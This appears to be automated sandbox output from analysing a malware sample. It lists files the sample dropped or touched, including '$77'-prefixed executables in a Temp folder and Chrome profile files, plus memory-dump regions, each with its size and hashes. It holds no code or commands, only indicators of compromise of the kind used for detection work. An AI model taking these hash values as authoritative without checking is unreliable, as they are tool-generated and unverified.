C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
8KB
MD5cf5ef9ddb28996eedf404a6293c00330
SHA1eb9936808005b16cbf39aa4ecfcf3e2203aef5f4
SHA25676ddb7cf4ed4d19817901e79b0a172e7f63306db03ccd0af32770ad500410c52
SHA5122c63ebecf0f2c754a4553e0bbb1bf1900a1eb04df4167dbd956cea88b6893c3b42cc5e9618d6911aa39cb64644e765880d89a34958a549c8c4ef31246a9c8c21
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
8KB
MD5d9a2b985e64e79d6e650b6cbd4b67a6c
SHA125f66d86ec93f6ccdde3be79d621a3fa6dfbe894
SHA2565fce3371ff401c11d334037cb284b9422174d076e55373919346a9059455a4ad
SHA512b182b1b113f499b3924b7bbd7f5e08670a48e36f4fb97a599ab546b574cf3bd6473476c40efae84544c6b254042955918d784abd87989345e47015bcc1673171
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD583be8772b345d555d76cba96c719b0ec
SHA157bfef2b3d40a96dd7903ac53d6fa19e62708186
SHA2563ea5c54e3a6b34bb318f26b81ea94a1bfd38e298e3feca1e03ae9ad857506a8a
SHA512b7a1557b14b1e4c4158fc973fd434243da88a5f948e16bd9f4b93f7e4363a56ae0e6fb029b0fcf517b1f99124e3324de93a7f61a276aaf367b471747e3207967
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
279KB
MD5fb2e4b4989f1b96485895c7839ea2548
SHA1d21cd5a9018e8c18eb8610ba9ab93e7ff438d964
SHA2562a2276092d890b2bdda7c29321677fa1849497c9c3a0480052015db849f9e295
SHA51208fe73784d41a85b9daa959f5cdb982e99aa7dd29ba288eeecdac7c67b27915a9e5a12639cdf730dc05839b073155dafe7bf522938c784767346b6ed1ec8a1b4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
279KB
MD5d3e45046a5f2fc0ad25265bba4bff0e8
SHA12b40f3aae2661239dc300d9a4831c9df6bce0341
SHA25640d7efaa62274ec1323c91e545e776f5891a4c4495069df108526ef809b2d057
SHA5121179775eab143e45422ffe08011efdb46bbda72405c078a5cc18516e66bac004ae0e1f0c26dfc12573ced6dfece648e7fee91ac95044e3d0da9b394a3483be43
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
82KB
MD5c34a132b5afa56a99c86e6c9d5a7a251
SHA19ac7d312831d08f8e108d840031cb6279661bf8a
SHA2563335ad700bd2b1cb2e62596b6a68550a7160498543969d062a0dc0c64c75c54f
SHA5127a593c9d206e3f0ead8e402a878d975e493915070a8715e477f53eb2a60485cb63d11265cf599157ed9a241297276d88505792f14681769aad376479c409270c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
99KB
MD5a8d31e76af0e259bbb030f80b097cf8e
SHA1e043a7c0a0f44e06db0f7214870609d209e01b6d
SHA25643541f587d8c056407b7ba51fd11532aa69498639749056dab3f408841fb4e13
SHA512b86a1a9d8b3c5b78e5bc5f8f5152ed2cf55444bce455a87ed7975ef4a482cb8d5b56107e9350b6bbeb3ca3bb36be350f3ff678fe12c7fc0aa59c784f459db776
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
14KB
MD5c4f3c29f24adac0d8c033d2c1e5508f3
SHA1f272966060d0f451485c6430a99aad749ad96320
SHA256499de30e49f4162b3bc732f176aaf2f4e5f56c95b63b556071197c8bb339b901
SHA512688517453af3168ac76858878cc5ba6c27a3a3b2d51e027547412e6b13ee6d08033b85c10c62aee8d0ed69c84be2d7d52b826ecda03aa0d82fc71fd32519ced5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
14KB
MD58f89e07fe4508ddeef1ba4567f254209
SHA1b5ef23e62964bfa1afabbc242a317e8b711de7e4
SHA256e4540cbba11d2026acb35efb7147ef0b44feb970ca3e316dc7670c603adc41cc
SHA5121930e13b538eceb56e2ab19d023fc3df1a4d8f2252f9f72a90df36746b94b0363cabf7737c7c93990f64b2cae2cb7deb195e7c5c326bc3c39057bd3b4bf9bbfd
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exeFilesize
66KB
MD5f10712f4faa374be8f37668c5ebed4a6
SHA1bb30e941c4f91ae3178539e993abecbfd838fdb0
SHA256d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
SHA512cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exeFilesize
163KB
MD51a7d1b5d24ba30c4d3d5502295ab5e89
SHA12d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exeFilesize
256KB
MD518f497deffe88b6b2cff336a277aface
SHA14e1413241d3d3e4dbff399d179f8fd64f3ecd39e
SHA2568133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
SHA51235c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exeFilesize
50KB
MD577a71f3a441aa3bf824967e52413bec5
SHA1c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
SHA2561e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
SHA51231c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
C:\Users\Admin\AppData\Local\Temp\7zip\7z.exeFilesize
257KB
MD51c3b5af02f308c2d61314fe6344a7434
SHA15a0278ad2d2cd2437044e4d8b5e998533982293b
SHA25664a0a588bfb057c877f42773976fd6952be90eafd373b3d0595fe20a8faccd74
SHA5126093b7258e29a04add73acb9f707f70c27149c9d65c9ecdb58452adedb8a7ad40a71af44927cf5b1e181d7ccab3bb39b68d0a737a7ab197943e464956624002f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-msFilesize
8KB
MD58b7ceacc0f2fa0557e3cd79b88983613
SHA1b06c3b1677d2a7ba1c75cf32e5aa41e63712888a
SHA256b326b55a265055eb350e6e0cd34aa43932d4716e6afb690459dd1a9293290b99
SHA51221b2048c1d3162bd685728fd1700b424af853b5d0559f63154fb16bdc04553c9b48c65bb2b5963fc4bff48fcfc025c560aaa6679e67b8d4024f5f6a5424eda02
-
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.confFilesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
C:\Windows\Temp\__PSScriptPolicyTest_53ly5u5v.avc.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
\??\pipe\crashpad_5004_SPKWPTGMQUPDTWCVMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/428-639-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmpFilesize
64KB
-
memory/428-632-0x00000164DD8D0000-0x00000164DD8FB000-memory.dmpFilesize
172KB
-
memory/428-638-0x00000164DD8D0000-0x00000164DD8FB000-memory.dmpFilesize
172KB
-
memory/616-643-0x00000214D9FB0000-0x00000214D9FDB000-memory.dmpFilesize
172KB
-
memory/640-599-0x0000020989030000-0x000002098905B000-memory.dmpFilesize
172KB
-
memory/640-605-0x0000020989030000-0x000002098905B000-memory.dmpFilesize
172KB
-
memory/640-606-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmpFilesize
64KB
-
memory/640-597-0x0000020989000000-0x0000020989025000-memory.dmpFilesize
148KB
-
memory/640-598-0x0000020989030000-0x000002098905B000-memory.dmpFilesize
172KB
-
memory/700-617-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmpFilesize
64KB
-
memory/700-616-0x000001E5DED40000-0x000001E5DED6B000-memory.dmpFilesize
172KB
-
memory/700-610-0x000001E5DED40000-0x000001E5DED6B000-memory.dmpFilesize
172KB
-
memory/1000-628-0x00007FFAE0030000-0x00007FFAE0040000-memory.dmpFilesize
64KB
-
memory/1000-621-0x000002086EFC0000-0x000002086EFEB000-memory.dmpFilesize
172KB
-
memory/1000-627-0x000002086EFC0000-0x000002086EFEB000-memory.dmpFilesize
172KB
-
memory/4608-1476-0x000000001CD40000-0x000000001CD4C000-memory.dmpFilesize
48KB
-
memory/4608-465-0x0000000000E50000-0x0000000000E62000-memory.dmpFilesize
72KB
-
memory/4608-1569-0x0000000020590000-0x0000000020AB8000-memory.dmpFilesize
5.2MB
-
memory/4608-1568-0x000000001CD50000-0x000000001CE00000-memory.dmpFilesize
704KB
-
memory/6656-561-0x0000000000D70000-0x0000000000D76000-memory.dmpFilesize
24KB
-
memory/6656-548-0x0000000000620000-0x0000000000666000-memory.dmpFilesize
280KB
-
memory/6656-1785-0x0000000001030000-0x000000000104E000-memory.dmpFilesize
120KB
-
memory/6656-1775-0x0000000001000000-0x0000000001010000-memory.dmpFilesize
64KB
-
memory/6656-1473-0x000000001C780000-0x000000001C7F6000-memory.dmpFilesize
472KB
-
memory/6964-576-0x000002025A9F0000-0x000002025AA12000-memory.dmpFilesize
136KB
-
memory/6964-579-0x00007FFB1F0E0000-0x00007FFB1F19D000-memory.dmpFilesize
756KB
-
memory/6964-578-0x00007FFB1FFA0000-0x00007FFB201A9000-memory.dmpFilesize
2.0MB
-
memory/6964-577-0x000002025ADA0000-0x000002025ADCA000-memory.dmpFilesize
168KB
-
memory/7108-477-0x0000000000A90000-0x0000000000AA6000-memory.dmpFilesize
88KB
-
memory/7456-591-0x00007FFB1F0E0000-0x00007FFB1F19D000-memory.dmpFilesize
756KB
-
memory/7456-587-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/7456-594-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/7456-590-0x00007FFB1FFA0000-0x00007FFB201A9000-memory.dmpFilesize
2.0MB
-
memory/7456-584-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/7456-589-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/7456-585-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/7456-586-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/9052-355-0x00000000008B0000-0x0000000001B50000-memory.dmpFilesize
18.6MB
-
memory/9052-354-0x00000000748FE000-0x00000000748FF000-memory.dmpFilesize
4KB